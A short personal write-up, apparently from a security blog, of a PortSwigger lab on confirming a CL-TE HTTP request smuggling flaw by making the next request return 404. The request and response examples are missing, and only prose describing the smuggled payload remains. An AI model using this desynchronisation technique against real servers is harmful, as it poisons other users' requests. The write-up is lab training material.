Self Notes: Web Security Academy HTTP Request Smuggling Lab 4

Lab 4 can be found here.

For Lab 4 our task is to confirm CL-TE Vulnerability via differential Response. A Front-end Back-end server pair has been provided, the Front-end server does not support chunked encoding, to solve the Lab we need to smuggle a request to the Back-end server so that subsequent request to the web-root (/) results in a 404 Not Found response. Like Lab 3 the provided endpoint is a comment posting section as below:


Response is:


We got a confirmation redirect. From the lab task, we have already been informed that the Front-end Back-end Server pair is CL-TE, meaning that the Front-end support Content-Length Header only while the Back-end support Transfer-Encoding Header, therefore avoiding the need for any test, we use the following request:


The above request now includes Transfer-Encoding: chunked so that the Back-end server will read a chunked request, the request also includes an extra payload which will be ignored by the Back-end server and will poison the next request, sending the above request result in normal response:


As expected a normal response is obtained from the server although the Back-end socket has now been poisoned with our payload. Any request to the server will now result in 404 not found response as below:


A valid request to the already poisoned Back-end server yielded a 404 Not Found response. Lab 4 solved.

Comments

Popular posts from this blog

Before You Dive In...

OverTheWire: Bandit Lab

SSRF Notes: PortSwigger Labs Continued